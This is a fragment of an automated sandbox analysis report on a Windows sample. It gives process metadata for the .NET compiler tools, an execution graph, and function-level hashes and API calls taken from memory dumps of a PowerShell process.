                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.cmdline
                Imagebase:0xc90000
                File size:2170976 bytes
                MD5 hash:350C52F71BDED7B99668585C15D70EEA
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Reputation:moderate

                General

                Target ID:13
                Start time:14:52:02
                Start date:28/01/2022
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7F9.tmp" "c:\Users\user\AppData\Local\Temp\ridmj1ad\CSC3DE241659FC44F82A3F695B8E7FD432F.TMP"
                Imagebase:0x870000
                File size:43176 bytes
                MD5 hash:C09985AE74F0882F208D75DE27770DFA
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate

                Disassembly

                Reset < >

                  Execution Graph

                  Execution Coverage:9.5%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:0%
                  Total number of Nodes:101
                  Total number of Limit Nodes:10
                  execution_graph 24905 7e618d3 24908 7e63db0 24905->24908 24906 7e618de 24909 7e63dd9 24908->24909 24910 7e6403b 24908->24910 24911 7e63e56 24909->24911 24912 7e63028 SetThreadUILanguage 24909->24912 24913 7e63038 SetThreadUILanguage 24909->24913 24911->24906 24912->24911 24913->24911 24868 7e69d00 24869 7e69d11 24868->24869 24873 7e693a0 24869->24873 24878 7e69390 24869->24878 24870 7e69d4f 24874 7e693af 24873->24874 24875 7e693fe 24874->24875 24883 7e690d7 24874->24883 24889 7e690e8 24874->24889 24875->24870 24879 7e693a0 24878->24879 24880 7e693fe 24879->24880 24881 7e690d7 GetFileAttributesW 24879->24881 24882 7e690e8 GetFileAttributesW 24879->24882 24880->24870 24881->24880 24882->24880 24884 7e69125 24883->24884 24885 7e690e7 24883->24885 24884->24884 24885->24884 24895 7e68fc0 24885->24895 24900 7e68f91 24885->24900 24886 7e69144 24890 7e69110 24889->24890 24891 7e69125 24890->24891 24893 7e68fc0 GetFileAttributesW 24890->24893 24894 7e68f91 GetFileAttributesW 24890->24894 24892 7e69144 24893->24892 24894->24892 24896 7e68fd3 24895->24896 24897 7e69002 24895->24897 24898 33c4278 GetFileAttributesW 24896->24898 24899 33c4288 GetFileAttributesW 24896->24899 24897->24886 24898->24897 24899->24897 24901 7e68fc0 24900->24901 24902 7e69002 24901->24902 24903 33c4278 GetFileAttributesW 24901->24903 24904 33c4288 GetFileAttributesW 24901->24904 24902->24886 24903->24902 24904->24902 24788 33c1770 24789 33c1782 24788->24789 24793 33c4278 24789->24793 24798 33c4288 24789->24798 24790 33c17b1 24794 33c4292 24793->24794 24795 33c42b7 24794->24795 24803 33c4340 24794->24803 24808 33c4331 24794->24808 24795->24790 24799 33c4292 24798->24799 24800 33c42b7 24799->24800 24801 33c4340 GetFileAttributesW 24799->24801 24802 33c4331 GetFileAttributesW 24799->24802 24800->24790 24801->24800 24802->24800 24804 33c4353 24803->24804 24813 33c43b8 24804->24813 24819 33c43a8 24804->24819 24805 33c4371 24805->24795 24809 33c4353 24808->24809 24811 33c43b8 GetFileAttributesW 24809->24811 24812 33c43a8 GetFileAttributesW 24809->24812 24810 33c4371 24810->24795 24811->24810 24812->24810 24814 33c43cd 24813->24814 24816 33c44d3 24814->24816 24825 33c4948 24814->24825 24815 33c4492 24815->24816 24817 33c4948 GetFileAttributesW 24815->24817 24816->24805 24817->24816 24821 33c43cd 24819->24821 24820 33c44d3 24820->24805 24821->24820 24824 33c4948 GetFileAttributesW 24821->24824 24822 33c4492 24822->24820 24823 33c4948 GetFileAttributesW 24822->24823 24823->24820 24824->24822 24830 33c4948 GetFileAttributesW 24825->24830 24832 33c49a8 24825->24832 24826 33c4978 24826->24815 24827 33c4972 24827->24826 24837 33c3f9c 24827->24837 24830->24827 24833 33c49c0 24832->24833 24834 33c49d5 24833->24834 24835 33c3f9c GetFileAttributesW 24833->24835 24834->24827 24836 33c4a06 24835->24836 24836->24827 24838 33c4df0 GetFileAttributesW 24837->24838 24840 33c4a06 24838->24840 24840->24815 24841 33cdde0 24847 33cc5b4 24841->24847 24843 33cde15 24845 33cdedc CreateFileW 24846 33cdf19 24845->24846 24848 33cde88 CreateFileW 24847->24848 24850 33cddff 24848->24850 24850->24843 24850->24845 24851 7e63878 24852 7e638a6 24851->24852 24853 7e63884 24851->24853 24853->24852 24856 7e63028 24853->24856 24860 7e63038 24853->24860 24857 7e63038 24856->24857 24858 7e630b5 24857->24858 24864 7e61d74 24857->24864 24858->24853 24862 7e6305e 24860->24862 24861 7e61d74 SetThreadUILanguage 24863 7e630b5 24861->24863 24862->24861 24862->24863 24863->24853 24865 7e65c08 SetThreadUILanguage 24864->24865 24867 7e65c79 24865->24867 24867->24858

                  Executed Functions

                  Function 033CE7C8 Relevance: .2, Instructions: 231COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000003.00000002.1180024294.00000000033C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_33c0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 23fad27d29a08ba40ccb7439bda974c1e9bfe2a772e59be4adfe8f88206972b4
                  • Instruction ID: b8d12302e82cccca873c72b67cf83a7084fca41c08b5419dde941a91650a5435
                  • Opcode Fuzzy Hash: 23fad27d29a08ba40ccb7439bda974c1e9bfe2a772e59be4adfe8f88206972b4
                  • Instruction Fuzzy Hash: 73A18C74614285CFEB18DB24C498BAEBBE2BF88305F14856CD4069B7A1DB78ED45CB81
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 07E01253 Relevance: 2.8, Strings: 2, Instructions: 279COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 7e01253-7e0126b 1 7e012dd-7e0131c 0->1 2 7e0126d-7e01288 0->2 17 7e01323-7e01336 1->17 5 7e012a2-7e012ca 2->5 6 7e0128a-7e01290 2->6 14 7e012d8-7e012db 5->14 15 7e012cc-7e012ce 5->15 8 7e01292 6->8 9 7e01294-7e012a0 6->9 8->5 9->5 14->17 15->14 18 7e01338-7e01353 17->18 19 7e013a9-7e013e8 17->19 22 7e01355-7e0135b 18->22 23 7e0136d-7e01396 18->23 34 7e013ef-7e01402 19->34 24 7e0135d 22->24 25 7e0135f-7e0136b 22->25 32 7e013a4-7e013a7 23->32 33 7e01398-7e0139a 23->33 24->23 25->23 32->34 33->32 35 7e01408-7e0142f 34->35 36 7e0148a-7e014d9 34->36 41 7e01431-7e01437 35->41 42 7e01449-7e01477 35->42 53 7e014e0-7e014ec 36->53 43 7e01439 41->43 44 7e0143b-7e01447 41->44 51 7e01485-7e01488 42->51 52 7e01479-7e0147b 42->52 43->42 44->42 51->53 52->51 54 7e014f2-7e014f7 53->54 55 7e015b4-7e01602 53->55 56 7e014f9-7e014ff 54->56 57 7e0150f-7e01565 54->57 72 7e01607-7e0160e 55->72 59 7e01501 56->59 60 7e01503-7e0150d 56->60 71 7e0156d-7e015b2 57->71 59->57 60->57 71->72
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1186335387.0000000007E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_7e00000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: l2Xk$l2Xk
                  • API String ID: 0-602142042
                  • Opcode ID: 0ae7509e9cf329d641473672b5150771e5784e6f1439ea18a219aae8eada7fca
                  • Instruction ID: 2f5f20c81965d3c5581325ff74adc889864e3b759b2efc1560d9836e9c1941f8
                  • Opcode Fuzzy Hash: 0ae7509e9cf329d641473672b5150771e5784e6f1439ea18a219aae8eada7fca
                  • Instruction Fuzzy Hash: 93A1D7B0B05219ABC714DB98C550A5DB3E2EF89718F26805DEA06BF790DB71AC42CB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 033CDDE0 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 77 33cdde0-33cde13 call 33cc5b4 81 33cde3e-33cded4 77->81 82 33cde15-33cde3d 77->82 91 33cdedc-33cdf17 CreateFileW 81->91 92 33cded6-33cded9 81->92 93 33cdf19-33cdf1f 91->93 94 33cdf20-33cdf3d 91->94 92->91 93->94
                  Memory Dump Source
                  • Source File: 00000003.00000002.1180024294.00000000033C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_33c0000_powershell.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 094be79c429d0ed395f2f97b9105f69c9aa58ee1363689492f959a773938c65a
                  • Instruction ID: 6733015f8519f9b6ebbfba025e0b7984c9e9955624e089c98b75e8020ce1a3ed
                  • Opcode Fuzzy Hash: 094be79c429d0ed395f2f97b9105f69c9aa58ee1363689492f959a773938c65a
                  • Instruction Fuzzy Hash: 2541DF71A0424D9FDB00DFA9D845BAEFFB5FB48314F05C12AE608AB381D775A840CBA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 033CDE80 Relevance: 1.6, APIs: 1, Instructions: 64fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 97 33cde80-33cded4 100 33cdedc-33cdf17 CreateFileW 97->100 101 33cded6-33cded9 97->101 102 33cdf19-33cdf1f 100->102 103 33cdf20-33cdf3d 100->103 101->100 102->103
                  APIs
                  • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,033CDDFF,00000000,00000000,00000003,00000000,00000002), ref: 033CDF0A
                  Memory Dump Source
                  • Source File: 00000003.00000002.1180024294.00000000033C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_33c0000_powershell.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 9e12e100b8443b8f1101742b61c3be48218ed193bb34e30d7a76cd3ec689385a
                  • Instruction ID: 3ed76971bc161e226bbe81a497ddc66bc00d1358f4c6ab7337198ced563c36ab
                  • Opcode Fuzzy Hash: 9e12e100b8443b8f1101742b61c3be48218ed193bb34e30d7a76cd3ec689385a
                  • Instruction Fuzzy Hash: 432149B2D0065D9FCF10CF99D884ADEFBB4FB48314F04822AE918A7610C775A954CFA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 033CC5B4 Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 106 33cc5b4-33cded4 109 33cdedc-33cdf17 CreateFileW 106->109 110 33cded6-33cded9 106->110 111 33cdf19-33cdf1f 109->111 112 33cdf20-33cdf3d 109->112 110->109 111->112
                  APIs
                  • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,033CDDFF,00000000,00000000,00000003,00000000,00000002), ref: 033CDF0A
                  Memory Dump Source
                  • Source File: 00000003.00000002.1180024294.00000000033C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_33c0000_powershell.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 833b62a34f73ca4d5f101cf68f740964eeb7f7860a14aba7ce007e7831379536
                  • Instruction ID: 873f2316ac9a324e315d3002bc0af69b800e3484c084384fad339289f1a864e2
                  • Opcode Fuzzy Hash: 833b62a34f73ca4d5f101cf68f740964eeb7f7860a14aba7ce007e7831379536
                  • Instruction Fuzzy Hash: D82134B2D0025DAFCB10CF99D884ADEFBB4FB48310F04822AE918A7610D775A954CFA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 033C4DE8 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 115 33c4de8-33c4e3a 117 33c4e3c-33c4e3f 115->117 118 33c4e42-33c4e6d GetFileAttributesW 115->118 117->118 119 33c4e6f-33c4e75 118->119 120 33c4e76-33c4e93 118->120 119->120
                  APIs
                  • GetFileAttributesW.KERNELBASE(00000000), ref: 033C4E60
                  Memory Dump Source
                  • Source File: 00000003.00000002.1180024294.00000000033C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_33c0000_powershell.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 1155e86990caf5269f9a55ace4bbbce9075a0c311a0dd57f7ec0d496db02797d
                  • Instruction ID: d597616e6c7ac886bc7f222fb66ffc89b68b3adad33b5fa9d84f666da4f9c0b3
                  • Opcode Fuzzy Hash: 1155e86990caf5269f9a55ace4bbbce9075a0c311a0dd57f7ec0d496db02797d
                  • Instruction Fuzzy Hash: 4A1156B1D006598FCB10CFAAD484BDEFBB4FB48324F05812AD918B7600D774AA05CFA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 033C3F9C Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 123 33c3f9c-33c4e3a 126 33c4e3c-33c4e3f 123->126 127 33c4e42-33c4e6d GetFileAttributesW 123->127 126->127 128 33c4e6f-33c4e75 127->128 129 33c4e76-33c4e93 127->129 128->129
                  APIs
                  • GetFileAttributesW.KERNELBASE(00000000), ref: 033C4E60
                  Memory Dump Source
                  • Source File: 00000003.00000002.1180024294.00000000033C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_33c0000_powershell.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: d62b6fc6ad6d1d88a8d6b4995e8ed85549d22bc2299a938851400245705eceb6
                  • Instruction ID: f4c2ff1bf47750c2ad24916392fdb4dfccb60e9ce773a70ac0337d3ec69c29c6
                  • Opcode Fuzzy Hash: d62b6fc6ad6d1d88a8d6b4995e8ed85549d22bc2299a938851400245705eceb6
                  • Instruction Fuzzy Hash: 022167B0C0065D8BCB10CFAAD8847DEFBB4FB48324F05811AD918B3200D774A900CFA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 07E61D74 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 132 7e61d74-7e65c77 SetThreadUILanguage 135 7e65c80-7e65c9a 132->135 136 7e65c79-7e65c7f 132->136 136->135
                  APIs
                  • SetThreadUILanguage.KERNELBASE ref: 07E65C6A
                  Memory Dump Source
                  • Source File: 00000003.00000002.1186712071.0000000007E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_7e60000_powershell.jbxd
                  Similarity
                  • API ID: LanguageThread
                  • String ID:
                  • API String ID: 243849632-0
                  • Opcode ID: ca2994c0d34c97decb16ee55b758e172c534f081dcd52b2f17d101e7fc088895
                  • Instruction ID: c9d89487f34214c272230d7c44b16b40afaef7e62fb88b4a09e34d95e3d064e9
                  • Opcode Fuzzy Hash: ca2994c0d34c97decb16ee55b758e172c534f081dcd52b2f17d101e7fc088895
                  • Instruction Fuzzy Hash: 3A1145B09007598FDB10DF99C488BEEFBF4EB48324F10845AD558B3200C379A944CFA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 07E00CB0 Relevance: .3, Instructions: 319COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000003.00000002.1186335387.0000000007E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_7e00000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5301e35f1e124f2a5da4e17debb104fea462b32382d01f6a0383354dd24beeaa
                  • Instruction ID: f7052c03c47e3b425f8def63366beea03b4281f77d68b47f9792d034bae5eb7d
                  • Opcode Fuzzy Hash: 5301e35f1e124f2a5da4e17debb104fea462b32382d01f6a0383354dd24beeaa
                  • Instruction Fuzzy Hash: C7A1E5B17052599FCB24CF64C440AAAB7E2EFC9318F15806AE9499B391DB31DCD1CBE1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 07E00CA9 Relevance: .1, Instructions: 145COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000003.00000002.1186335387.0000000007E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_7e00000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ac7a619bebac25897dc94f0cdd0e99e75a34f8ef77c993cff11fca05224ea665
                  • Instruction ID: b1743bccc7e6a7426466cccdb4cbd12550c15ae54c8a3ee403bc392dd5b79b6f
                  • Opcode Fuzzy Hash: ac7a619bebac25897dc94f0cdd0e99e75a34f8ef77c993cff11fca05224ea665
                  • Instruction Fuzzy Hash: FD51C5B1602209CFCF24CF54C544BAAB7E2AF48318F159069E909AB7A1C731ECC1CBD1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 07E00285 Relevance: .0, Instructions: 49COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000003.00000002.1186335387.0000000007E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_7e00000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dbad9eaf244d77e1fb48e31d9b393be938214c79f5d15187df929ec6f34fc1fb
                  • Instruction ID: 2aa4534919ab3d16a7f78e33e328249fa27da75e297640eb813ac3579922d8e2
                  • Opcode Fuzzy Hash: dbad9eaf244d77e1fb48e31d9b393be938214c79f5d15187df929ec6f34fc1fb
                  • Instruction Fuzzy Hash: F501F5A1A0A3C29FC31343791824695AFA29FC755472900A7C141CF7E7CA318C89C3E2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Function 07E6BF18 Relevance: 3.1, Strings: 2, Instructions: 645COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1186712071.0000000007E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_7e60000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: Mh$ah
                  • API String ID: 0-3820676340
                  • Opcode ID: 9cd94e4e4a8f2d267c16cca2352e079e4936bf085de261b4bca5bbd50cbc5ad2
                  • Instruction ID: 9aa47c9a5b9b0542954877cac8442f784b57259b4cd9ea5b87646c22d35b7fba
                  • Opcode Fuzzy Hash: 9cd94e4e4a8f2d267c16cca2352e079e4936bf085de261b4bca5bbd50cbc5ad2
                  • Instruction Fuzzy Hash: 3B32AEB0A012098FCB14DFA4D4849AEB7F2EF89344F15846AD44ADB765DF34EC46CBA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 07E00857 Relevance: 5.1, Strings: 4, Instructions: 135COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1186335387.0000000007E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_7e00000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: l2Xk$l2Xk$l2Xk$l2Xk
                  • API String ID: 0-3784031231
                  • Opcode ID: aa260232fb1b35a3347ceacd24b50b25501f48d183906f98b89e388385b343eb
                  • Instruction ID: 0ab2a85bd3377b27d375ebff701d680f6ee7d758196730937974f892e98ec7e7
                  • Opcode Fuzzy Hash: aa260232fb1b35a3347ceacd24b50b25501f48d183906f98b89e388385b343eb
                  • Instruction Fuzzy Hash: FF41D7B0B01245AFD754DF58C550AAD77E2EFC9314F158029E906AF790DB72DC82CB91
                  Uniqueness

                  Uniqueness Score: -1.00%